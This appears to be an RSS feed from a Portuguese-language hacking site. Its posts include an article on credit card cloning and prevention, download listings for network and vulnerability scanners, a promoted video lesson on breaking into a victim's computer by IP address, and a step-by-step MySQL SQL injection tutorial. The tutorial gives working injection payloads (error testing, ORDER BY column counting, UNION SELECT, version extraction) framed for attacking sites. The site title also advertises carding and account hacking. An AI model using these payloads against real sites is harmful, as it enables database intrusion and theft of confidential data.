<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>InvasaoHacking.com - Downloads, Dicas de Segurança, Video Aulas e Tutoriais sobre Hacker, Trojans, Keyloggers, Worms, Malwares, Virus, phishing, Exploit, Shells, Defacer, banking, carding, Hackear orkut, Hackear Msn, Hackear Facebook, Hackear Habbo, Hackear Gmail, Hackear Hotmail</title>
	<atom:link href="http://www.invasaohacking.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.invasaohacking.com</link>
	<description>       Um mundo hacker diferente e consciente no qual você aprende!</description>
	<lastBuildDate>Wed, 10 Mar 2010 04:58:34 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Clonagem de cartão de credito: entenda como acontece e os riscos</title>
		<link>http://www.invasaohacking.com/2010/03/10/clonagem-de-cartao-de-credito-entenda-como-acontece-e-os-riscos/</link>
		<comments>http://www.invasaohacking.com/2010/03/10/clonagem-de-cartao-de-credito-entenda-como-acontece-e-os-riscos/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 04:58:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Dicas de Segurança]]></category>
		<category><![CDATA[Banking]]></category>
		<category><![CDATA[Clonar cartão de credito]]></category>
		<category><![CDATA[roubo de informações]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=640</guid>
		<description><![CDATA[O prejuízo dos chupa-cabras já soma mais de R$ 31 milhões no primeiro semestre de 2009 e continua crescendo por todo o país. Entenda como este crime acontece e descubra formas de prevenção.
Ter um cartão de crédito já abre uma nova porta para um perigo quase iminente aos usuários do dinheiro de plástico. Não é novidade que os cartões magnéticos são clonados de maneira grosseira por todos os cantos do país. Entretanto, o prejuízo causado por este tipo de fraude já ultrapassou a casa dos 31 milhões de reais só ...]]></description>
			<content:encoded><![CDATA[<p><strong>O prejuízo dos chupa-cabras já soma mais de R$ 31 milhões no primeiro semestre de 2009 e continua crescendo por todo o país. Entenda como este crime acontece e descubra formas de prevenção.</strong></p>
<p>Ter um cartão de crédito já abre uma nova porta para um perigo quase iminente aos usuários do dinheiro de plástico. Não é novidade que os cartões magnéticos são clonados de maneira grosseira por todos os cantos do país. Entretanto, o prejuízo causado por este tipo de fraude já ultrapassou a casa dos 31 milhões de reais só no primeiro semestre de 2009. Esse valor ainda não atinge grandes quantias se comparado à compra total via cartão de crédito no Brasil, mas já chegou a 1% deste todo.</p>
<p>Os “<strong>cartãozeiros</strong>”, como são chamados os fraudadores de cartões magnéticos, possuem diversas táticas para fazer com que o dono do cartão caia em um golpe. Há alguns anos, antes da introdução dos cartões com chip no mercado, o índice de clonagens era muito maior. Se ação fosse realizada em um caixa eletrônico em uma agência bancária (o que não é nenhum pouco incomum) os bandidos colocariam o “<strong>chupa-cabra</strong>” – aparelho usado para copiar as trilhas magnéticas do cartão – no leitor de cartões e, em um lugar um pouco mais alto, filmariam o cliente digitando a senha.</p>
<p style="text-align: left;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Clonagem-de-cartão-de-credito-entenda-como-acontece-e-os-riscos.jpg"><img class="size-full wp-image-641 aligncenter" title="Clonagem de cartão de credito entenda como acontece e os riscos" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Clonagem-de-cartão-de-credito-entenda-como-acontece-e-os-riscos.jpg" alt="Clonagem de cartão de credito entenda como acontece e os riscos" width="425" height="282" /></a></p>
<p style="text-align: left;">
<p style="text-align: left;">Estes aparelhos que roubam a identificação magnética dos cartões nada mais são do que leitoras comuns alteradas para que passem a gravar estes códigos e reproduzi-los em cartões quaisquer. No entanto, este método é um tanto grosseiro para os padrões tecnológicos que temos hoje. Infelizmente, a tecnologia também chega para auxiliar organizações criminosas e usuários mal intencionados.</p>
<p><strong>Mau uso da tecnologia</strong></p>
<p>Com a chegada dos sites bancários e das funções home-banking, o bandido só precisa encontrar um arquivo espião para fazer com que a senha e o número de cartão de crédito sejam roubados do computador do cliente. Isso acontece muito em casos de emails fraudulentos que se passam por comunicados da Receita Federal, Caixa Econômica Federal e outros bancos brasileiros ou até mesmo do exterior.</p>
<p>O processo de clonagem é mais simples do que muita gente pode imaginar. Porém, exige um arsenal de equipamentos que chegam a custar mais de 10 mil dólares. Nestes casos, o falsário não trabalha com materiais quaisquer e sim com réplicas quase idênticas aos cartões originais das operadoras mais variadas. Para fazer essa falsificação as quadrilhas utilizam impressoras de cartões, máquinas para criação de hologramas, impressão das letras em alto relevo e uma série de outros equipamentos.</p>
<p>Entretanto, esse tipo de quadrilha altamente especializada é mais frequente em países estrangeiros. No Brasil, o que se vê com frequência são as falsificações grosseiras. Muitos bandidos aproveitam dos cartões magnéticos oferecidos em centros de diversão eletrônica de shoppings centers para reproduzir as trilhas magnéticas dos cartões originais.</p>
<p style="text-align: left;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Clonagem-de-cartões.jpg"><img class="size-full wp-image-642 aligncenter" title="Clonagem de  cartões" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Clonagem-de-cartões.jpg" alt="Clonagem de cartões" width="423" height="249" /></a></p>
<p style="text-align: left;">
<p style="text-align: left;">As compras pela internet têm aumentado sensivelmente os números de fraudes envolvendo cartões de crédito em todo o Brasil. Os mesmos arquivos maliciosos escondidos em emails falsos roubam informações como número do cartão, data de validade e o código de segurança de três dígitos. Com esses dados, qualquer pessoa pode fazer compras no nome de quem quer que seja o dono daqueles dados. Por isso, se você costuma abrir todos os emails que chegam na sua caixa de entrada, comece a ser um pouco mais seletivo e desconfie de remetentes desconhecidos.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="295" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/V3pElQD8UZg&amp;hl=pt_BR&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="295" src="http://www.youtube.com/v/V3pElQD8UZg&amp;hl=pt_BR&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p style="text-align: left;"><strong>Como funciona o golpe</strong></p>
<p>Primeiro de tudo, os bandidos precisam de um aparelho que leia cartões para poder revertê-lo de modo que o dispositivo passe a gravar as trilhas magnéticas que passam pelos seus contatos. Depois, este código é repassado para um segundo cartão que pode, ou não, ter o mesmo aspecto estético do original. O processo de transformação de cartões plásticos comuns em cópias quase fiéis de cartões verdadeiros leva a quadrilha a desembolsar uma boa quantia em dinheiro.</p>
<p style="text-align: left;">Normalmente estas fraudes não se restringem apenas aos cartões magnéticos. Quem faz falsificações dos cartões também pode fazer cédulas de identidade falsas, CPFs adulterados e uma série de outros documentos cuja confecção de um exemplar falso podem levar à cadeia. A pena para este tipo de crime varia de 1 a 3 anos de prisão (caso o documento falsificado seja particular; ex.: a própria carteira de identidade) ou de 1 a 5 anos, se o documento for público, como é o caso dos cartões de crédito.<br />
<a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/7444.jpg"><img class="alignleft size-medium wp-image-643" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/7444-300x199.jpg" alt="" width="189" height="166" /></a>Se a quadrilha decidir atuar de maneira direta nos caixas eletrônicos e máquinas de cartão nas lojas a forma de enganar tanto o lojista quanto o consumidor é uma afronta. O bandido se faz passar por um técnico da operadora de cartão de crédito e diz que vai fazer a manutenção da máquina. Na verdade ele instala o “chupa-cabra” para conseguir os dados do cartão.</p>
<p style="text-align: left;"><strong>Cartões com chip: aumento na segurança?</strong></p>
<p>A chegada dos cartões com chip aumentou a segurança dos usuários de serviços de crédito. Essa tecnologia unificou dois cartões em um só e evitar que o cliente ande com um cartão para débito e outro para crédito como acontecia com os cartões magnéticos. Os chips possuem mais memória e fazem com que um único cartão possua as duas opções de pagamento: débito e crédito. Além disso, essa tecnologia conseguiu derrubar os níveis de fraudes em 98% em território francês.<a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/cartao-de-credito.jpg"></a></p>
<p style="text-align: left;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/cartao-de-credito.jpg"><img class="alignleft size-medium wp-image-644" title="cartao de credito" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/cartao-de-credito-300x199.jpg" alt="cartao de credito" width="300" height="199" /></a>Um dos motivos pelos quais os cartões de chip são tão mais seguros que aqueles de tarja magnética está no fato de que essa nova tecnologia trabalha com autenticação offline, ou seja, não exige que o terminal (caixa eletrônico) esteja conectado com qualquer tipo de sistema além do que já está instalado. Esse tipo de cartão também é mais seguro no que se refere às transações feitas pela internet e dispensa a assinatura do portador, uma vez que o PIN do cartão é capaz de substituir essa necessidade.</p>
<p>A segurança dos chips também está no fato de que todos os dados contidos neste sistema estão criptografados. Entretanto, de nada adianta avançar cada vez mais a tecnologia para garantir a segurança dos usuários se o próprio cliente não toma os devidos cuidados com os seus cartões e documentos. Até mesmo os cartões de ônibus e metrô já passam por situação semelhante. Porém, a técnica para isso é diferente, afinal o sistema de funcionamento desses cartões é baseado em um sistema de Identificação por Frequência de Rádio – a mesma utilizada em etiquetas inteligentes em lojas.</p>
<p>Talvez ainda não exista um método 100% seguro para que as administradoras de cartão de crédito consigam manter os cartões longe dos falsários. Até mesmo o chip já sofre com algumas falsificações, afinal o que houve foi apenas a digitalização do processo que antes era analógico. Mesmo assim, é muito mais seguro fazer uso de cartões de chip do que continuar o uso daqueles que ainda têm a tarja magnética.</p>
<p style="text-align: left;"><strong>Golpes populares e como não ser enganado</strong></p>
<p>Existe milhares de maneiras utilizadas pelos bandidos para conseguir as suas informações sobre números de cartão de crédito. Às vezes é você mesmo quem “entrega o ouro para o bandido”. Alguém liga para a sua casa se identificando como um funcionário da operadora do seu cartão de crédito e informa que foi feita uma compra de um objeto bastante incomum no seu nome com um valor bastante alto.</p>
<p style="text-align: left;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/clonagem-de-cartao.jpg"><img class="alignleft size-medium wp-image-645" title="clonagem de cartao" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/clonagem-de-cartao-300x225.jpg" alt="clonagem de cartao" width="300" height="225" /></a>Ao responder que não, você dará brecha para que o bandido diga que o seu cartão talvez tenha sido clonado e que é preciso fazer uma verificação. Ele pedirá que você informe o seu endereço, número do cartão e o número do PIN. Com esses dados o ladrão poderá fazer compras no seu nome a qualquer hora do dia. Ao final da ligação o suposto atendente pede que você telefone para a central de segurança da operadora do cartão informando o ocorrido.</p>
<p>Contudo, logo depois de desligar o telefone, já existirá uma compra no seu cartão e dessa vez ela é verdadeira e aconteceu por você ter cedido os números de segurança do seu cartão de crédito. Por isso, nunca diga a ninguém informações referentes à sua conta bancária ou cartões de débito ou crédito. Pode ser extremamente perigoso e, sem saber, você pode colaborar com o crime.</p>
<p>Outro golpe bastante difundido é o tão famoso “chupa-cabras”. Como não podemos saber se aquela máquina de pagamentos está ou não adulterada, procure nunca permitir que o atendente leve o cartão para longe da sua vista. Pode parecer um tanto exagerado, mas toda precaução é pouco quando o que está em jogo é manter o seu nome limpo na praça. Por isso, sempre que for realizar pagamentos com o seu dinheiro de plástico, fique atento para qualquer movimentação estranha.</p>
<p>Caso o seu cartão fique preso na máquina da loja ou no caixa eletrônico, procure anular ou cancelar a compra e comunique imediatamente o seu banco. Caso você utilize o telefone da cabine do caixa, verifique se o telefone funciona. Em caso negativo, o golpe é quase certo. Neste caso, não aceite ajuda de nenhum estranho.</p>
<p>Além dessas medidas de segurança, é importante que você se certifique que ninguém está observando enquanto estiver digitando a sua senha. É um direito seu exigir que as outras pessoas aguardem a vez respeitando as faixas marcadas no chão do banco. Dessa maneira você evita dores de cabeça envolvendo a segurança dos cartões e da conta bancária.</p>
<p style="text-align: left;"><strong>E você? Já passou por algo parecido?</strong> Conte para a gente e para os outros usuários qual foi a sua experiência! É importante compartilhar essas informações para que o extravio de cartões, roubo de números e senhas seja evitado! Afinal, mais de 31 milhões de reais já foram perdidos em todo o país só nos primeiros seis meses de 2009. Se você tem informações a respeito de alguma quadrilha ou teve seu cartão clonado, informe imediatamente o seu banco e a polícia.</p>
<p>Fique ligado para mais dicas de segurança no InvasãoHacking!</p>
<p>Até a próxima!</p>
<p style="text-align: left;"><strong>Fonte: </strong>Baixaki</p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/10/clonagem-de-cartao-de-credito-entenda-como-acontece-e-os-riscos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SoftPerfect Network Scanner</title>
		<link>http://www.invasaohacking.com/2010/03/07/softperfect-network-scanner/</link>
		<comments>http://www.invasaohacking.com/2010/03/07/softperfect-network-scanner/#comments</comments>
		<pubDate>Sun, 07 Mar 2010 04:09:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Rede]]></category>
		<category><![CDATA[Scanners]]></category>
		<category><![CDATA[Internet Protocol]]></category>
		<category><![CDATA[Ip]]></category>
		<category><![CDATA[ipscan]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=617</guid>
		<description><![CDATA[
&#8220;Monitore IP, SNMO e NetBIOS numa rede.&#8221;
SoftPerfect Network Scanner é um monitorador de IP, SNMP e NetBIOS com várias ferramentas avançadas.
Projetado tanto para administradores como para usuários que se interessam por segurança. O programa executa um ping em computadores, procura por portas TCP que estejam abertas e exibe que tipo de recursos estão compartilhados na rede. Pode trabalhar com portas definidas pelo usuário e resolve hosts captando seu endereço IP local.
Gratuito
Tamanho: 697 KB
Sistema: Windows XP/Vista/98/2000/2003
Empresa: SoftPerfect Research

]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Softperfect-Network-Scanner.jpg"><img class="size-medium wp-image-618 aligncenter" title="Softperfect Network Scanner" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Softperfect-Network-Scanner-300x227.jpg" alt="Softperfect Network Scanner" width="300" height="227" /></a></p>
<p><strong>&#8220;Monitore IP, SNMO e NetBIOS numa rede.&#8221;</strong></p>
<p>SoftPerfect Network Scanner é um monitorador de IP, SNMP e NetBIOS com várias ferramentas avançadas.</p>
<p>Projetado tanto para administradores como para usuários que se interessam por segurança. O programa executa um ping em computadores, procura por portas TCP que estejam abertas e exibe que tipo de recursos estão compartilhados na rede. Pode trabalhar com portas definidas pelo usuário e resolve hosts captando seu endereço IP local.</p>
<p><strong>Gratuito</strong><br />
<strong>Tamanho:</strong> 697 KB<br />
<strong>Sistema: </strong>Windows XP/Vista/98/2000/2003<br />
<strong>Empresa:</strong> SoftPerfect Research</p>
<p><a href="http://www.4shared.com/file/235872668/8ed26522/SoftPerfect_Network_Scanner_By.html" target="_blank"><img class="alignleft size-full wp-image-43" title="Clique aqui para Baixar" src="http://www.invasaohacking.com/wp-content/uploads/2010/01/downloads.jpg" alt="Clique aqui para Baixar" width="192" height="95" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/07/softperfect-network-scanner/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Angry IP Scanner 2.21</title>
		<link>http://www.invasaohacking.com/2010/03/07/angry-ip-scanner-2-21/</link>
		<comments>http://www.invasaohacking.com/2010/03/07/angry-ip-scanner-2-21/#comments</comments>
		<pubDate>Sun, 07 Mar 2010 03:52:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Rede]]></category>
		<category><![CDATA[Scanners]]></category>
		<category><![CDATA[Internet Protocol]]></category>
		<category><![CDATA[Ip]]></category>
		<category><![CDATA[ipscan]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=611</guid>
		<description><![CDATA[
&#8220;Cheque por portas abertas, resolva host names, varra máquinas mortas e muito mais.&#8221;
Angry IP Scanner é um escaneador de portas IP extremamente rápido. Ele possui opções variadas como a resolução de host names, checagem de portas abertas, varredura de máquinas mortas, colunas de escaneamento configuráveis, varreduras de múltiplas portas, exportação para vários formatos e suporte a plugins.
Gratuito
Tamanho: 961 KB
Sistema: Windows XP/98/2000
Empresa: Angryziber Software

]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Angry-IP-Scanner-2.21.jpg"><img class="size-full wp-image-612 aligncenter" title="Angry IP Scanner 2.21" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Angry-IP-Scanner-2.21.jpg" alt="Angry IP Scanner 2.21" width="400" height="282" /></a></p>
<p><strong>&#8220;Cheque por portas abertas, resolva host names, varra máquinas mortas e muito mais.&#8221;</strong></p>
<p>Angry IP Scanner é um escaneador de portas IP extremamente rápido. Ele possui opções variadas como a resolução de <em>host names</em>, checagem de portas abertas, varredura de máquinas mortas, colunas de escaneamento configuráveis, varreduras de múltiplas portas, exportação para vários formatos e suporte a plugins.</p>
<p><strong>Gratuito<br />
Tamanho:</strong> 961 KB<br />
<strong>Sistema:</strong> Windows XP/98/2000<br />
<strong>Empresa:</strong> Angryziber Software</p>
<p><a href="http://www.4shared.com/file/235858660/95745e14/Angry_IP_Scanner_221_By_Diablo.html" target="_blank"><img class="alignleft size-full wp-image-43" title="Clique aqui para Baixar" src="http://www.invasaohacking.com/wp-content/uploads/2010/01/downloads.jpg" alt="Clique aqui para Baixar" width="192" height="95" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/07/angry-ip-scanner-2-21/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sandcat – Scanner de vulnerabilidades de sistemas e servidores web</title>
		<link>http://www.invasaohacking.com/2010/03/06/sandcat-%e2%80%93-scanner-de-vulnerabilidades-de-sistemas-e-servidores-web/</link>
		<comments>http://www.invasaohacking.com/2010/03/06/sandcat-%e2%80%93-scanner-de-vulnerabilidades-de-sistemas-e-servidores-web/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 20:52:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Scanners]]></category>
		<category><![CDATA[Blind Sql Injection]]></category>
		<category><![CDATA[Mssql injection]]></category>
		<category><![CDATA[Sql Injection]]></category>
		<category><![CDATA[xpath injection]]></category>
		<category><![CDATA[Xss]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=602</guid>
		<description><![CDATA[
Considere o Sandcat um NMap especializado em varrer servidores web (como IIS ou Apache) e aplicações web (o seu site!). Isso facilita muito, pois você pode testar um determinado site ou servidor procurando por vários tipos de falhas como SQL Injection, Blind SQL Injection, XSS, XPath Injection, etc.
Ela é gratuita para ser utilizada e bem completa (bem próxima do nível do Web Vulnerability Scanner, da Acunetix). Ele checa por, aproximadamente, 260 vulnerabilidades conhecidas (utilizando o ranking de várias entidades como OWASP, OWASP PHP, CVE, CWE, etc), detecta falhas de XSS ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Sandcat-–-Scanner-de-vulnerabilidades-de-sistemas-e-servidores-web.jpg"><img class="size-medium wp-image-604      aligncenter" title="Sandcat – Scanner de vulnerabilidades de sistemas e servidores web" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Sandcat-–-Scanner-de-vulnerabilidades-de-sistemas-e-servidores-web-300x205.jpg" alt="Sandcat – Scanner de vulnerabilidades de sistemas e servidores web!" width="300" height="205" /></a></p>
<p style="text-align: left;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Sandcat-–-Scanner-de-vulnerabilidades-de-sistemas-e-servidores-web.jpg"></a>Considere o <strong>Sandcat</strong> um <strong>NMap</strong> especializado em varrer servidores web (como IIS ou Apache) e aplicações web (o seu site!). Isso facilita muito, pois você pode testar um determinado site ou servidor procurando por vários tipos de falhas como SQL Injection, Blind SQL Injection, XSS, XPath Injection, etc.<br />
Ela é gratuita para ser utilizada e bem completa (bem próxima do nível do Web Vulnerability Scanner, da Acunetix). Ele checa por, aproximadamente, 260 vulnerabilidades conhecidas (utilizando o ranking de várias entidades como OWASP, OWASP PHP, CVE, CWE, etc), detecta falhas de XSS (Cross Site Scripting), testas sistemas IDS, consegue explorar sistemas web desenvolvidos utilizando AJAX, descobre e analisa a configuração utilizada no servidor automaticamente para descobrir quais testes são necessários, etc.</p>
<p><strong>E Necessário se cadastrar no site para poder baixar o programa.</strong></p>
<p><a href="http://www.syhunt.com/?section=sandcatpro.download" target="_blank"><img class="alignleft size-full wp-image-43" title="Clique aqui para Baixar" src="http://www.invasaohacking.com/wp-content/uploads/2010/01/downloads.jpg" alt="Clique aqui para Baixar" width="192" height="95" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/06/sandcat-%e2%80%93-scanner-de-vulnerabilidades-de-sistemas-e-servidores-web/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Invasão de computador pelo endereço IP</title>
		<link>http://www.invasaohacking.com/2010/03/06/invasao-de-computador-pelo-endereco-ip/</link>
		<comments>http://www.invasaohacking.com/2010/03/06/invasao-de-computador-pelo-endereco-ip/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 09:59:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Video Aulas]]></category>
		<category><![CDATA[Aulas Hacking]]></category>
		<category><![CDATA[invasão de computador]]></category>
		<category><![CDATA[Penetration Tests]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=597</guid>
		<description><![CDATA[Nessa video aula estarei encinando como invadir um computador utilizando apenas o ip da vitima. No video estou utilizando  2 programas o Amac Address para fazer um scan na rede e capturar os endereços IP&#8217;s, E o languard para scanear o endereço IP a procura de  Compartilhamentos abertos. Todos os programas estão no site para download basta utilizar o formulario de pesquisa que vocês encontram.

Autor: Diablos 4-Ever
]]></description>
			<content:encoded><![CDATA[<p>Nessa video aula estarei encinando como invadir um computador utilizando apenas o ip da vitima. No video estou utilizando  2 programas o <strong>Amac Address</strong> para fazer um scan na rede e capturar os endereços IP&#8217;s, E o <strong>languard</strong> para scanear o endereço IP a procura de  Compartilhamentos abertos. Todos os programas estão no site para download basta utilizar o formulario de pesquisa que vocês encontram.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="537" height="408" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYHLg20A" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="537" height="408" src="http://blip.tv/play/AYHLg20A" allowfullscreen="true"></embed></object></p>
<p style="text-align: left;"><strong>Autor:</strong> Diablos 4-Ever</p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/06/invasao-de-computador-pelo-endereco-ip/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Tutorial SQL Injection (MySQL)</title>
		<link>http://www.invasaohacking.com/2010/03/05/tutorial-sql-injection-mysql/</link>
		<comments>http://www.invasaohacking.com/2010/03/05/tutorial-sql-injection-mysql/#comments</comments>
		<pubDate>Fri, 05 Mar 2010 12:25:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tutoriais]]></category>
		<category><![CDATA[MYSQL Injection]]></category>
		<category><![CDATA[Penetration Tests]]></category>
		<category><![CDATA[Sql Injection]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=589</guid>
		<description><![CDATA[
Neste tutorial é feito uma descrição de como utilizar o Sql Injection para obter algumas informações.
Primeiramente: O que é Sql Injection?
É uma das vulnerabilidade mais comuns atualmente. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site obtendo, assim, informações confidenciais.
1 &#8211; Sql Injection (clássico ou baseado em erros).
Medidas adotadas para explorar a vulnerabilidade.
A) Verificar a Vulnerabilidade.
Abaixo um exemplo qualquer para análise da vulnerabilidade. O link fictício mostra uma página qualquer de um site, imaginemos que seja uma página de um ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Tutorial-SQL-INJECTION.jpg"><img class="aligncenter size-full wp-image-592" title="Tutorial SQL INJECTION" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Tutorial-SQL-INJECTION.jpg" alt="Tutorial SQL INJECTION" width="454" height="293" /></a></p>
<p>Neste tutorial é feito uma descrição de como utilizar o Sql Injection para obter algumas informações.</p>
<p>Primeiramente: O que é Sql Injection?</p>
<p>É uma das vulnerabilidade mais comuns atualmente. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site obtendo, assim, informações confidenciais.</p>
<p><strong>1 &#8211; Sql Injection (clássico ou baseado em erros).</strong></p>
<p>Medidas adotadas para explorar a vulnerabilidade.</p>
<p><strong>A) Verificar a Vulnerabilidade.</strong></p>
<p>Abaixo um exemplo qualquer para análise da vulnerabilidade. O link fictício mostra uma página qualquer de um site, imaginemos que seja uma página de um fórum hacker lixo de invasão.</p>
<p><code> http://www.site.com/news.php?id=5</code></p>
<p>Para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( <span style="color: #ff0000;">&#8216;</span> ). Abaixo é mostrado a forma como a url ficará.<br />
<code>http://www.site.com/news.php?id=5'</code></p>
<p>Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection <img src='http://www.invasaohacking.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<code>"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the...</code></p>
<p>O erro acima diz que você possui um erro na síntaxe da consulta Sql e pede para você checar o manual correspondente ao SGBD que você está utilizando. &#8220;Até parece que você é o administrador do site&#8221; <img src='http://www.invasaohacking.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Agora que checamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Iremos ao passo seguinte.</p>
<p><strong>B) &#8211; Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.</strong></p>
<p>Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY.</p>
<p>Mas como utilizar este comando Sql?</p>
<p>Simples! Ao final da url você adiciona o comando order by e vai adicionando uma sequência de Colunas/Tabelas, ou seja, você pode acionar a coluna correspondente. Caso queira olhar a coluna 1, ordene assim:<br />
<code>http://www.site.com/news.php?id=5 order by 1</code></p>
<p>Se não aparecer nenhum erro é por que esta Coluna/Tabela número 1 existe. Lembre-se que esta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro dizendo que a Coluna/Tabela é inexistente no banco de dados.<br />
<code>http://www.site.com/news.php?id=5 order by 1/* &lt;-- Sem erro</code></p>
<p><code>http://www.site.com/news.php?id=5 order by 2/* &lt;-- Sem erro</code></p>
<p><code>http://www.site.com/news.php?id=5 order by 3/* &lt;-- Sem erro</code></p>
<p><code>http://www.site.com/news.php?id=5 order by 4 &lt;-- Com erro</code></p>
<p>O exemplo acima, é atribuido Colunas/Tabelas (1..2..3..4), no entanto, é mencionado erro na Coluna/Tabela 4. Conclui-se então que esta Coluna/Tabela é inexistente e que o banco possui apenas 3 Colunas/Tabelas.</p>
<p><strong>C) &#8211; Utilizando a função UNION.</strong></p>
<p>Esta função poderosa é responsável por unir vários dados localizados em Colunas/Tabelas diferentes. &#8220;Que massa hem!&#8221; <img src='http://www.invasaohacking.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Vamos utilizar o exemplo abaixo para melhor exemplificar.<br />
<code> http://www.site.com/news.php?id=5 union all select 1,2,3</code></p>
<p>Explicando a Sql:<br />
O exemplo acima vai possibilitar ao &#8220;Injectador&#8221; visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.<br />
<code>...?id ... union all select 1,2,3</code></p>
<p>Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.site.com/news.php. Está e a ordem que você atribui ao comando colocado na url do site.</p>
<p><strong>D) &#8211; Descobrindo a versão do SGBD (MySql).</strong><br />
<code>http://www.site.com/news.php?id=5 union all select 1,2,3</code></p>
<p>Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes no banco. Agora para visualizar a versão do banco é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,@@version,3</code></p>
<p>Caso não der certo, você receberá uma mensagem de erro semelhante a esta:<br />
<code>"union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."</code></p>
<p>Para resolver este erro necessitamos utilizar a função convert(). Exemplo abaixo:<br />
<code>http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/</code></p>
